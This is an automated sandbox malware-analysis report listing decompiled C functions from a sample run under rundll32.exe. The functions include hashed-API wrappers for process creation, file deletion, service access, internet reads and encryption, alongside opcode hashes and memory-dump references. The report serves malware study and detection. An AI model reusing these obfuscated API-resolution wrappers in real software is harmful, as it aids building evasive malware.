SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0023C762

Strings

/O, xrefs: 0023C6E6

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 8d8e337f00c3192cdd29c10cc9b4f922268430cbab26b068a59f539cbbc88e3d
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 9C1133B290122DBBCB25DF95DC4A8EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00231000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00231000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0023602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002407A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00231006
0x00231009
0x0023100c
0x00231011
0x00231016
0x0023101d
0x00231026
0x0023102d
0x00231034
0x0023103b
0x00231047
0x0023104f
0x00231057
0x0023105e
0x00231065
0x0023106c
0x00231073
0x00231077
0x0023108b
0x00231096
0x0023109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00231096

Strings

[, xrefs: 0023103B

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: e58eb9bd9a0dd2f4184544d5c7de3129890655c1ea17d86febe5a0eb92b555e5
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: AE015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649F91

Uniqueness

Uniqueness Score: -1.00%

Function 00234859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00234859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002407A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0023485e
0x0023487a
0x0023487d
0x00234884
0x0023488b
0x00234892
0x0023489d
0x002348a0
0x002348ad
0x002348b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002348B7

Strings

[, xrefs: 0023488B

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 7b45bb183b61e0dc11828fde01c81c53077722e1bcb1deb7bc3696ed0e51f854
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 7CF017B0A15209FBDB08CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B51

Uniqueness

Uniqueness Score: -1.00%

Function 00244F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00244F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002407A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00244f80
0x00244f81
0x00244f82
0x00244f86
0x00244f87
0x00244f8c
0x00244fa5
0x00244fa8
0x00244faf
0x00244fb6
0x00244fc7
0x00244fca
0x00244fd7
0x00244fe2
0x00244fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00244FE2

Strings

{#lm, xrefs: 00244FC2

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: d9e351559df2f839ea3f993d8248c07b88d719110bbe9f1616a24110082f9faf
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 8FF037B082120CFFDB08DFA4D98689EBFBAEB40300F208199E804AB250D3715B509B51

Uniqueness

Uniqueness Score: -1.00%

Function 0024976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0024976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002407A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00249772
0x00249773
0x00249778
0x0024977a
0x0024977b
0x0024977e
0x0024977f
0x00249782
0x00249785
0x00249788
0x00249789
0x0024978c
0x0024978f
0x00249790
0x00249791
0x00249794
0x00249797
0x0024979a
0x0024979d
0x002497a0
0x002497a3
0x002497a6
0x002497a7
0x002497a8
0x002497ad
0x002497b7
0x002497c3
0x002497ca
0x002497d1
0x002497d8
0x002497df
0x002497e3
0x002497fc
0x00249816
0x0024981d

APIs

CreateProcessW.KERNEL32(0023591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0023591A), ref: 00249816

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 8aaaab428069adbc48d01d1842b8f6c1b76137c32856cc0d43b623e32781480e
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: E911B372911148BBDF199FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0023B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0023B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0023602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002407A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0023b569
0x0023b56a
0x0023b56d
0x0023b572
0x0023b574
0x0023b577
0x0023b57a
0x0023b57d
0x0023b580
0x0023b583
0x0023b586
0x0023b587
0x0023b58a
0x0023b58d
0x0023b590
0x0023b593
0x0023b594
0x0023b595
0x0023b59a
0x0023b5a4
0x0023b5b8
0x0023b5c0
0x0023b5c4
0x0023b5cb
0x0023b5d2
0x0023b5d9
0x0023b5e6
0x0023b5fd
0x0023b604

APIs

CreateFileW.KERNELBASE(00240668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00240668,?,?,?,?), ref: 0023B5FD

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: ae4d34fd2688908d7b37844e0c7cd486ab6290dc1b62701abbb9e3509a401dc7
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: E911C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB51

Uniqueness

Uniqueness Score: -1.00%

Function 0024981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0024981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002407A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00249821
0x00249822
0x00249825
0x00249828
0x0024982a
0x0024982c
0x0024982f
0x00249832
0x00249835
0x00249836
0x00249837
0x0024983c
0x00249855
0x00249858
0x0024985f
0x00249866
0x0024986d
0x00249874
0x0024987b
0x0024988e
0x0024989b
0x002498a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002387F2,0000CAAE,0000510C,AD82F196), ref: 0024989B

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 5c104816d0916b2f742d7da5e2f5af63a7c104f2388a3feb003ea95f8739dd8b
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 78015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00247BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00247BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002407A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00247bf7
0x00247bf8
0x00247bfa
0x00247bfd
0x00247bff
0x00247c02
0x00247c06
0x00247c07
0x00247c0f
0x00247c1d
0x00247c25
0x00247c2d
0x00247c31
0x00247c38
0x00247c3f
0x00247c46
0x00247c4a
0x00247c5e
0x00247c67
0x00247c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00247C67

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 770df398bab2141a37eb02192e8c8783d3f149e98fc0c61528bafcf87d895afb
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 0A014FB190120CFFEB09DF94C84A8DEBBB9EF44314F108198F50567240E6B15F609B91

Uniqueness

Uniqueness Score: -1.00%

Function 0023F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0023F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002407A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0023f662
0x0023f663
0x0023f665
0x0023f668
0x0023f66a
0x0023f66d
0x0023f670
0x0023f673
0x0023f677
0x0023f678
0x0023f67d
0x0023f687
0x0023f693
0x0023f69a
0x0023f6a1
0x0023f6a5
0x0023f6a9
0x0023f6b0
0x0023f6c9
0x0023f6d8
0x0023f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0023F6D8

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: b0aab0a77048a0e0be9577124c09f0a3f59ce9ddf5566f454e9b60349f3fc5fa
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: FC01E5B6901208BBEF059F94DC4A8DF7F79EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0023B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0023B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0023602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002407A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0023b6f3
0x0023b6f8
0x0023b702
0x0023b70b
0x0023b712
0x0023b719
0x0023b720
0x0023b727
0x0023b72e
0x0023b747
0x0023b759
0x0023b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0023B759

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 793f8dda759908818510c1c0dcc9dcb3ef21eb4d32d3cbd2049d11a1b0679531
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: D60178B2950308FBEB45DF90DD06A9E7BB5EB08704F108188FA09261A0D3B25A20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0024AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0024AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002407A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0024aa3f
0x0024aa40
0x0024aa41
0x0024aa44
0x0024aa47
0x0024aa4b
0x0024aa4c
0x0024aa51
0x0024aa5b
0x0024aa64
0x0024aa68
0x0024aa6f
0x0024aa76
0x0024aa8d
0x0024aa90
0x0024aa9d
0x0024aaa8
0x0024aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0024AAA8

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: d30233234a1f3f2a51f3f54581c7389b96fb4482909fd5c53c65e4e98134fc17
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: BBF069B191020CFFDF08DF94DD4A89EBFB8EB40304F108088F905A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00235FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00235FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002407A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00235fb5
0x00235fb6
0x00235fb7
0x00235fbb
0x00235fbc
0x00235fc1
0x00235fcb
0x00235fd7
0x00235fde
0x00235fe5
0x00235ffc
0x00235fff
0x00236006
0x0023600d
0x0023601a
0x00236025
0x0023602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00236025

Memory Dump Source

Source File: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000A.00000002.2105441961.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105491145.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 98202d1760a7fff82657aed4a5d7fd5f1196688f7f282afeb6b2d7103732bb22
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: B0F04FB0C11208FFDB08DFA0E94789EBFB8EB40300F208198E509A7260E7715F559F55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2864 Parent PID: 3068 rundll32.exeCOMMON

Executed Functions

Function 0024023A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0024023A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				signed int _v8;
				signed int _v12;
				void* _t25;
				int _t31;
				void* _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t37 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t25);
				_v12 = 0x4c1d;
				_v12 = _v12 ^ 0x5ad90362;
				_v12 = _v12 ^ 0x5ad955af;
				_v8 = 0xc5f7;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x98520be0;
				_v8 = _v8 + 0xd998;
				_v8 = _v8 ^ 0x98094817;
				E002407A9(0xb92c1268, 0x1f801b8, __ecx, __ecx, 0x1c9);
				_t31 = InternetReadFile(_t37, _a8, _a16, _a20); // executed
				return _t31;
			}

0x0024023d
0x0024023e
0x00240240
0x00240243
0x00240245
0x00240248
0x0024024b
0x0024024e
0x00240252
0x00240253
0x00240258
0x00240262
0x0024026e
0x00240275
0x0024028c
0x0024028f
0x00240296
0x0024029d
0x002402aa
0x002402bc
0x002402c2

APIs

InternetReadFile.WININET(00000000,2CD2473D,0003F015,FFEAC835), ref: 002402BC

Strings

move one or more drives, or go back and choose a different location to save the backup on., xrefs: 00240269

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileInternetRead
String ID: move one or more drives, or go back and choose a different location to save the backup on.
API String ID: 778332206-1830404547
Opcode ID: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
Instruction ID: bd97aa51b5f65618040082b8ecb6fc63ef3cf943a850379a0ba5213f1529ff92
Opcode Fuzzy Hash: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
Instruction Fuzzy Hash: 8B012576912208FFEF05EF94D9068DEBFB9EF04314F108188F90466261D372AF61AB91

Uniqueness

Uniqueness Score: -1.00%

Function 002375AE, Relevance: 1.6, APIs: 1, Instructions: 62
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E002375AE(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				signed int _t55;
				void* _t63;
				void* _t64;

				_t64 = __edx;
				E0023602B(_t43);
				_v8 = 0x98b5;
				_v8 = _v8 >> 9;
				_t54 = 0x5f;
				_v8 = _v8 / _t54;
				_v8 = _v8 + 0xffff1c63;
				_v8 = _v8 ^ 0xffff635b;
				_v12 = 0x5016;
				_v12 = _v12 + 0xffff6b9b;
				_t55 = 0x41;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x03f03403;
				_t51 = E002407A9(0x93576eb5, 0x12e6675d, _t55, _t55, 0x110);
				_t52 =  *_t51(_a36, _a12, _t64, _a20, _a32, 0, _a8, _a24, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t63, __ecx, __ecx); // executed
				return _t52;
			}

0x002375b7
0x002375d8
0x002375dd
0x002375e7
0x002375f2
0x002375f7
0x002375fc
0x00237603
0x0023760a
0x00237611
0x0023761b
0x00237623
0x0023762b
0x0023763f
0x0023765c
0x00237662

APIs

